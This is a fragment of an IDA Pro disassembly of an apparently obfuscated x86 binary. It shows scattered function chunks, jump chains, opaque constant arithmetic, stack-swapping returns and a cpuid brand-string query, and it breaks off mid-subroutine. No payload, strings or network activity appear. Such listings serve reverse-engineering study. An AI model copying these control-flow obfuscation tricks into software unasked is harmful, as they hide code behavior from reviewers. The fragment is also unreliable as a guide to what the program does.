; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F73
loc_4242A0: ; CODE XREF: sub_423F73:loc_423F7E�j
jmp nullsub_13
; END OF FUNCTION CHUNK FOR sub_423F73
; ---------------------------------------------------------------------------
loc_4242A5: ; CODE XREF: _0182ofla:00429C2C�j
mov ebp, [edx]
jmp loc_42C817
; =============== S U B R O U T I N E =======================================
sub_4242AC proc near ; CODE XREF: sub_425629:loc_4231A4�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00429351 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E805 SIZE 00000015 BYTES
push ebx
push 0F9DF8715h
sub ebx, eax
jmp loc_429351
sub_4242AC endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A3C
loc_4242BA: ; CODE XREF: sub_425A3C+5�j
push offset loc_4233E4
jmp loc_429781
; END OF FUNCTION CHUNK FOR sub_425A3C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_4242C4: ; CODE XREF: sub_42938A-31F6�j
pop edx
rol edx, 0Ah
and edx, 0BEC10871h
call sub_425499
loc_4242D3: ; CODE XREF: sub_42966F+38FF�j
jmp loc_427D3C
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_4242D8: ; CODE XREF: sub_42A642+9�j
jmp loc_42836D
; END OF FUNCTION CHUNK FOR sub_42A642
; ---------------------------------------------------------------------------
loc_4242DD: ; CODE XREF: _0182ofla:0042A49A�j
jmp loc_424B32
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_4242E2: ; CODE XREF: sub_42E218-611E�j
jmp loc_42568D
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_4242E7: ; CODE XREF: sub_425B6E+1A20�j
jmp loc_42E597
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
adc ebx, 42D20212h
jmp loc_42883B
; ---------------------------------------------------------------------------
loc_4242F7: ; CODE XREF: _0182ofla:00423317�j
jo loc_42E66B
; =============== S U B R O U T I N E =======================================
sub_4242FD proc near ; CODE XREF: _0182ofla:00428E72�p
; FUNCTION CHUNK AT 0042720A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00429632 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042E1FF SIZE 00000010 BYTES
xchg esi, [esp+0]
pop esi
push edi
jmp loc_429632
sub_4242FD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B02
loc_424307: ; CODE XREF: sub_427B02:loc_425E75�j
pushf
jmp loc_42573A
; END OF FUNCTION CHUNK FOR sub_427B02
; =============== S U B R O U T I N E =======================================
sub_42430D proc near ; DATA XREF: sub_42CB53:loc_428F72�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042308B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A1FE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A555 SIZE 0000000E BYTES
push ecx
push 14667001h
pop ecx
add ecx, 17863E95h
xor ecx, 3DF0E728h
cmp ecx, 1066910Dh
jmp loc_42A1FE
sub_42430D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42432B: ; CODE XREF: sub_423395:loc_427AF9�j
sbb ebp, ecx
shr ebp, 0Fh
jmp loc_42C44D
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
mov ebx, [edi]
jmp loc_424C5B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42433C proc near ; CODE XREF: sub_42C1D1�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00423C4A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042CDDD SIZE 00000008 BYTES
mov [esp+0], ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp+var_8], eax
add edx, ebx
jmp loc_423C4A
sub_42433C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4283BB
loc_42434E: ; CODE XREF: sub_4283BB+C�j
pop ebx
mov ebp, offset loc_4283D7
xchg ebp, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_4283BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E785
loc_424358: ; CODE XREF: sub_42E785+12�j
jmp loc_42572D
; END OF FUNCTION CHUNK FOR sub_42E785
; ---------------------------------------------------------------------------
loc_42435D: ; CODE XREF: _0182ofla:004272D5�j
sub ebx, eax
ror edx, 11h
mov ebx, eax
mov eax, offset loc_42CF87
jmp loc_42CF7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42436E: ; CODE XREF: sub_42660C:loc_428B79�j
pushf
jmp loc_42CF93
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DB2E
loc_424374: ; CODE XREF: sub_42DB2E:loc_42981C�j
call sub_425063
; END OF FUNCTION CHUNK FOR sub_42DB2E
; START OF FUNCTION CHUNK FOR sub_42968B
loc_424379: ; CODE XREF: sub_42968B+C�j
; sub_42D056:loc_429E7E�j
jmp loc_428DF1
; END OF FUNCTION CHUNK FOR sub_42968B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42437E: ; CODE XREF: _0182ofla:loc_4248DB�j
; sub_42B15E-2578�j
jmp loc_42B6D5
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
sub esi, 4B3F824Ch
jbe loc_4230C7
jmp sub_42A1D9
; ---------------------------------------------------------------------------
mov [eax], edi
jle loc_4238D2
jmp sub_42D5EF
; ---------------------------------------------------------------------------
loc_4243A1: ; DATA XREF: sub_424B70:loc_428363�o
jz loc_42A5DD
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4243A7: ; CODE XREF: sub_42798F:loc_426836�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_4270F9
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jmp loc_42A5D2
; ---------------------------------------------------------------------------
loc_4243C6: ; CODE XREF: sub_42798F:loc_424C0D�j
push ecx
jmp loc_42C68F
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_59. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_229. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_4243CE: ; CODE XREF: sub_42940E-17FC�j
jmp loc_426FF9
; END OF FUNCTION CHUNK FOR sub_42940E
; =============== S U B R O U T I N E =======================================
sub_4243D3 proc near ; DATA XREF: sub_42E5F8-86DA�o
; FUNCTION CHUNK AT 00426D98 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B2B4 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042C1DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E299 SIZE 0000000B BYTES
add eax, [ebp-4]
add eax, 18h
mov [ebp-4], eax
mov eax, [ebp-10h]
test eax, eax
jmp loc_426D98
sub_4243D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_4243E6: ; CODE XREF: sub_423A2A:loc_42670D�j
jnz loc_42AAC3
jmp loc_42AC39
; END OF FUNCTION CHUNK FOR sub_423A2A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4243F2 proc near ; CODE XREF: _0182ofla:00428DDA�j
; sub_42AAD2+47B�p
xchg ebx, [esp+0]
pop ebx
push ds:dword_427A44
retn
sub_4243F2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6D5
loc_4243FD: ; CODE XREF: sub_42A6D5-831�j
jmp loc_42659A
; END OF FUNCTION CHUNK FOR sub_42A6D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4284E7
loc_424402: ; CODE XREF: sub_4284E7+F�j
mov eax, [ebp-1Ch]
mov al, [eax]
mov edx, [ebp-20h]
mov [edx], al
push offset sub_4255BB
jmp loc_42B684
; END OF FUNCTION CHUNK FOR sub_4284E7
; ---------------------------------------------------------------------------
jno loc_42CBC4
jmp loc_426EA6
; ---------------------------------------------------------------------------
loc_424421: ; DATA XREF: sub_424E80+3�o
or eax, eax
jz loc_42DD4D
jmp loc_42D1ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265C0
loc_42442E: ; CODE XREF: sub_4265C0:loc_428F41�j
pop edx
add edx, 24808F1Ah
xchg edx, [esp+0Ch+var_C]
loc_424438: ; CODE XREF: sub_423FCD:loc_42CFDA�j
jmp loc_427A3D
; END OF FUNCTION CHUNK FOR sub_4265C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_42443D: ; CODE XREF: sub_42C1B2-7420�j
shr eax, 1Bh
test edi, ebp
jmp loc_42D274
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_424447: ; CODE XREF: sub_423F50+9E27�j
jnz loc_426551
lea eax, [ebp-125h]
push eax
loc_424454: ; CODE XREF: sub_423A2A:loc_42B418�j
call sub_426561
jmp loc_429F4E
; END OF FUNCTION CHUNK FOR sub_423F50
; =============== S U B R O U T I N E =======================================
sub_42445E proc near ; DATA XREF: sub_42D19B+1015�o
; FUNCTION CHUNK AT 00426ABE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C881 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042D5B9 SIZE 0000001D BYTES
mov edx, [eax]
mov al, 1
call edx
xchg ebx, [esp+0]
mov ebp, ebx
pop ebx
xor eax, eax
jmp loc_42D5B9
sub_42445E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_424471: ; CODE XREF: sub_423861+15�j
cmp ds:dword_42B8F8[eax*4], 0
jz loc_42D816
mov eax, [ebp+var_4]
push offset loc_429147
jmp nullsub_14
; END OF FUNCTION CHUNK FOR sub_423861
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42448C proc near ; DATA XREF: sub_427AD5+6�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042303F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423E64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042419D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00425FBB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042626A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004262C5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042832E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428E0E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042951C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004297B2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004297ED SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004299C6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429BE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A92B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AA86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CBFB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042E235 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_425FBB
sub_42448C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424498 proc near ; DATA XREF: _0182ofla:loc_426AB3�o
; FUNCTION CHUNK AT 00427111 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427435 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004284C6 SIZE 00000005 BYTES
lea eax, [ebp-80Ch]
push eax
push ecx
push 529E63ACh
add ecx, 2BBB4A13h
jmp loc_427435
sub_424498 endp
; ---------------------------------------------------------------------------
not ebx
jmp sub_42D33D
; ---------------------------------------------------------------------------
jg loc_42994B
jmp loc_4282B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_4244C2: ; CODE XREF: sub_42B669-1DBF�j
jz sub_428B91
jmp loc_427C65
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_4244CD: ; CODE XREF: sub_428729+6245�j
push offset sub_4256E8
jmp loc_42C5C0
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_4244D7: ; CODE XREF: sub_428F20:loc_42D11E�j
add [esi], eax
call sub_429957
jnp loc_42653E
jmp loc_42DD84
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4244E9: ; CODE XREF: sub_42798F:loc_4249A0�j
; sub_42798F:loc_425315�j ...
jnb loc_428D78
cmp dword ptr [ebp-4], 4
jnz loc_425520
call sub_42D875
; END OF FUNCTION CHUNK FOR sub_42798F
; START OF FUNCTION CHUNK FOR sub_428A08
loc_4244FE: ; CODE XREF: _0182ofla:loc_423937�j
; sub_428A08+A�j
jmp nullsub_44
; END OF FUNCTION CHUNK FOR sub_428A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_424503: ; CODE XREF: sub_427ED1+1A�j
jmp loc_429A15
; END OF FUNCTION CHUNK FOR sub_427ED1
; ---------------------------------------------------------------------------
loc_424508: ; DATA XREF: sub_428A39:loc_42A699�o
xor esi, 0A9DF8A94h
add esi, ebp
add esi, 5468753Bh
mov [esi], eax
pop esi
cmp dword ptr [ebp-10h], 0
jz loc_42A7D0
jmp loc_42806A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_424528: ; CODE XREF: sub_42B1F9-411F�j
jnz loc_42A2C4
jmp loc_4290EB
; END OF FUNCTION CHUNK FOR sub_42B1F9
; =============== S U B R O U T I N E =======================================
sub_424533 proc near ; CODE XREF: _0182ofla:00425327�j
; sub_42ECFA�p
mov [esp+0], ebx
pop ebx
push ebp
mov ebp, esp
call sub_426993
loc_42453F: ; CODE XREF: _0182ofla:0042630C�j
jmp nullsub_15
sub_424533 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_424544: ; CODE XREF: sub_425EA5:loc_425EB4�j
jmp loc_42CD72
; END OF FUNCTION CHUNK FOR sub_425EA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_424549: ; CODE XREF: sub_42AAF8:loc_4241C6�j
; sub_42AAF8:loc_42AE6F�j
lea edx, [ebp-14h]
mov eax, offset dword_42D220
call sub_42B14D
lea eax, [ebp-14h]
push ebp
jmp loc_42A2E8
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
adc eax, edx
jmp sub_42C8C0
; ---------------------------------------------------------------------------
mov edx, 9E849D81h
call sub_42D71D
push eax
push offset sub_42E13B
jmp locret_4287FC
; ---------------------------------------------------------------------------
sub esi, 481DEDDh
mov ebp, 8A46EDDAh
jmp sub_42486B
; =============== S U B R O U T I N E =======================================
sub_42458B proc near ; CODE XREF: sub_42326C+2E0E�j
push ebp
xchg eax, ebp
call sub_424CD8
retn
sub_42458B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C718
loc_424594: ; CODE XREF: sub_42C718-2A0�j
jmp nullsub_244
; END OF FUNCTION CHUNK FOR sub_42C718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_424599: ; CODE XREF: sub_428F20-53E7�j
jmp loc_423B86
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426993
loc_42459E: ; CODE XREF: sub_426993+D�j
push offset loc_42D804
jmp nullsub_27
; END OF FUNCTION CHUNK FOR sub_426993
; ---------------------------------------------------------------------------
loc_4245A8: ; CODE XREF: _0182ofla:00426DE3�j
push offset loc_42925A
jmp loc_42A2D5
; ---------------------------------------------------------------------------
loc_4245B2: ; DATA XREF: _0182ofla:0042A88D�o
add eax, ebp
add eax, 556E1106h
push eax
push 100h
push offset sub_427ED1
jmp locret_429D05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4249FA
loc_4245CA: ; CODE XREF: sub_4249FA+3�j
push eax
mov eax, ecx
xchg eax, [esp+4+var_4]
mov esp, ebp
pop ebp
jmp loc_42AA2E
; END OF FUNCTION CHUNK FOR sub_4249FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_4245D8: ; CODE XREF: sub_427239-24C7�j
push ecx
mov esp, ebp
pop ebp
push 0DDDEE989h
pop eax
add eax, 457077AEh
xor eax, 5E1FC7C8h
add eax, 82F1C8B9h
jmp loc_42E60A
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_4245F9: ; CODE XREF: sub_426571+B32�j
cmp dword ptr [ebp-8], 0
jle loc_4262D2
mov eax, [ebp-4]
xor edx, edx
call sub_42D6DD
loc_42460D: ; CODE XREF: sub_425A5C+14�j
jmp loc_4239BD
; END OF FUNCTION CHUNK FOR sub_426571
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_424612: ; CODE XREF: sub_428A39-CD9�j
xchg esi, edx
; END OF FUNCTION CHUNK FOR sub_428A39
; =============== S U B R O U T I N E =======================================
sub_424614 proc near ; CODE XREF: sub_42798F:loc_428547�p
mov [esp+0], ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_424614 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42461C proc near ; CODE XREF: sub_42CFAD:loc_428542�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423D92 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00424BDD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004251C4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426D53 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427D05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A5B9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042B4F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ED1A SIZE 00000014 BYTES
push ebp
mov ebp, esp
jmp loc_424BDD
sub_42461C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235C7
loc_424624: ; CODE XREF: sub_4235C7+55BE�j
mov edi, ecx
mov edx, 832D1610h
loc_42462B: ; CODE XREF: sub_42ABB7:loc_42EB18�j
call sub_4247FE
test eax, eax
setnz byte ptr [ebp-1]
; END OF FUNCTION CHUNK FOR sub_4235C7
; START OF FUNCTION CHUNK FOR sub_42AB9B
loc_424636: ; CODE XREF: sub_42AB9B+6�j
; sub_42AB9B+17�j ...
mov al, [ebp-1]
pop ecx
pop ebp
jmp loc_423E9F
; END OF FUNCTION CHUNK FOR sub_42AB9B
; ---------------------------------------------------------------------------
loc_424640: ; CODE XREF: _0182ofla:loc_428AC4�j
xor edx, 1465BC66h
call sub_42D71D
call sub_428D17
push offset loc_426D34
jmp locret_42AFD9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C7D
loc_42465A: ; CODE XREF: sub_428C7D:loc_42C54E�j
mov ebp, eax
pop ebp
mov ecx, offset sub_42466B
xchg ecx, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_428C7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_424666: ; CODE XREF: sub_423861+6821�j
jmp loc_42734E
; END OF FUNCTION CHUNK FOR sub_423861
; =============== S U B R O U T I N E =======================================
sub_42466B proc near ; DATA XREF: sub_428C7D-4620�o
; FUNCTION CHUNK AT 00426747 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042785F SIZE 00000002 BYTES
pop ebx
jmp loc_426747
sub_42466B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_424671: ; CODE XREF: sub_427239:loc_426F1D�j
pushf
jmp loc_42C794
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425063
loc_424677: ; CODE XREF: sub_425063+E67�j
; sub_425063:loc_42AC84�j
mov eax, [ebp-0Ch]
push eax
call sub_427239
loc_424680: ; CODE XREF: _0182ofla:00426359�j
; sub_425063+3F4D�j ...
call sub_42D056
; END OF FUNCTION CHUNK FOR sub_425063
; START OF FUNCTION CHUNK FOR sub_42326C
loc_424685: ; CODE XREF: sub_42326C+9�j
jmp loc_42CAA0
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42468A: ; CODE XREF: sub_429E52-4922�j
jz loc_42A95D
jmp loc_42C109
; END OF FUNCTION CHUNK FOR sub_429E52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CAC9
loc_424697: ; CODE XREF: sub_42CAC9+E�j
jmp nullsub_109
; END OF FUNCTION CHUNK FOR sub_42CAC9
; =============== S U B R O U T I N E =======================================
sub_42469C proc near ; CODE XREF: _0182ofla:00428929�j
; DATA XREF: sub_427906+6416�o
mov eax, [ebp-0Ch]
mov esp, ebp
call sub_4272E4
sub_42469C endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_428F20
loc_4246A6: ; CODE XREF: sub_428F20:loc_424DC2�j
; sub_428F20+591C�j
mov eax, 80000002h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
jmp loc_42D11E
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
locret_4246B8: ; CODE XREF: _0182ofla:00425BCE�j
retn
; ---------------------------------------------------------------------------
loc_4246B9: ; CODE XREF: _0182ofla:0042B258�j
jmp locret_42D454
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425418
loc_4246BE: ; CODE XREF: sub_425418:loc_429BB4�j
call sub_42C415
; END OF FUNCTION CHUNK FOR sub_425418
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_4246C3: ; CODE XREF: sub_423A2A+92A1�j
jmp loc_42965F
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
and ebp, ecx
push 2F6DFC60h
jmp sub_4266D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_4246D4: ; CODE XREF: sub_42938A:loc_427123�j
jno loc_42929E
ror ecx, 0Fh
xor edi, ecx
mov [edx], ecx
jmp loc_426BFB
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_4246E6: ; CODE XREF: sub_42AB3E:loc_425A2D�j
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D553
loc_4246E8: ; CODE XREF: sub_42D553:loc_42350B�j
push 0D851016Eh
mov [esp+4+var_4], ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_425059
; END OF FUNCTION CHUNK FOR sub_42D553
; ---------------------------------------------------------------------------
mov eax, ecx
adc eax, 895143FBh
jmp sub_427D47
; =============== S U B R O U T I N E =======================================
sub_424707 proc near ; CODE XREF: _0182ofla:00425BAD�j
; sub_42B3C2:loc_426940�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423A1D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424E05 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00425CB1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426956 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426F03 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004274C0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004287EB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429B10 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00429F27 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042B548 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C523 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042CB3C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042D08C SIZE 00000014 BYTES
xchg edi, [esp-8+arg_4]
pop edi
not ecx
jz loc_429F27
push edx
push 0FF5B202Fh
jmp loc_42B548
sub_424707 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_106. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 1D658AEEh
pop edx
and edx, 5135171Fh
rol edx, 2
jnb loc_4285C3
loc_424734: ; CODE XREF: _0182ofla:0042AAA5�j
jmp loc_42E69C
; ---------------------------------------------------------------------------
sbb esi, 0F55DFF9Fh
jmp loc_4285BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_424744: ; CODE XREF: sub_42C1B2:loc_425C2D�j
mov ebp, esp
push ecx
mov [ebp-4], eax
call sub_4286A8
call sub_429B69
test al, al
jz loc_42E938
jmp loc_423748
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
locret_424761: ; CODE XREF: _0182ofla:00423310�j
retn
; =============== S U B R O U T I N E =======================================
sub_424762 proc near ; CODE XREF: sub_427942+3287�p
; _0182ofla:0042AC34�j
; FUNCTION CHUNK AT 0042E409 SIZE 0000000A BYTES
mov [esp+0], ebx
pop ebx
xor eax, esi
jmp loc_42E409
sub_424762 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42476D: ; CODE XREF: _0182ofla:loc_424F4D�j
push 0AC1EDD9Ch
pop eax
sub eax, 44AF543Eh
cmp eax, 8544778Fh
jmp loc_4236B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_128. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424785: ; CODE XREF: _0182ofla:0042774B�j
jmp loc_428E3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AC07
loc_42478A: ; CODE XREF: sub_42AC07-7A7C�j
cmp edi, ebx
jmp loc_427BB3
; END OF FUNCTION CHUNK FOR sub_42AC07
; ---------------------------------------------------------------------------
push 9195806h
jmp sub_428599
; ---------------------------------------------------------------------------
pop ecx
jmp sub_428A39
; ---------------------------------------------------------------------------
loc_4247A1: ; CODE XREF: _0182ofla:0042B80D�j
jnb loc_423FEB
; START OF FUNCTION CHUNK FOR sub_42326C
loc_4247A7: ; CODE XREF: sub_42326C:loc_42ADB5�j
add edi, 54584BD1h
xchg edi, [esp+4+var_4]
jmp loc_42A3DF
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
loc_4247B5: ; CODE XREF: _0182ofla:loc_42A209�j
sub esi, 0BE2AD2EAh
sbb eax, 422527BCh
jmp loc_42ED80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_4247C6: ; CODE XREF: sub_423A2A:loc_42E07F�j
sub edx, 15C9CE6Bh
add edx, 264A300h
xchg edx, [esp+0]
jmp sub_429AA3
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
test al, al
jz nullsub_34
jmp loc_42A4BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4247E7: ; CODE XREF: sub_42798F-CB5�j
cdq
ror eax, 18h
mov eax, ecx
loc_4247ED: ; CODE XREF: sub_42798F:loc_424ED2�j
push 663E7819h
jmp loc_424EFA
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_230. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D730
loc_4247F9: ; CODE XREF: sub_42D730+9�j
jmp loc_42EA28
; END OF FUNCTION CHUNK FOR sub_42D730
; =============== S U B R O U T I N E =======================================
sub_4247FE proc near ; CODE XREF: sub_4235C7:loc_42462B�p
; sub_42798F:loc_4288DC�p ...
; FUNCTION CHUNK AT 004250CA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042607F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004260A3 SIZE 0000001A BYTES
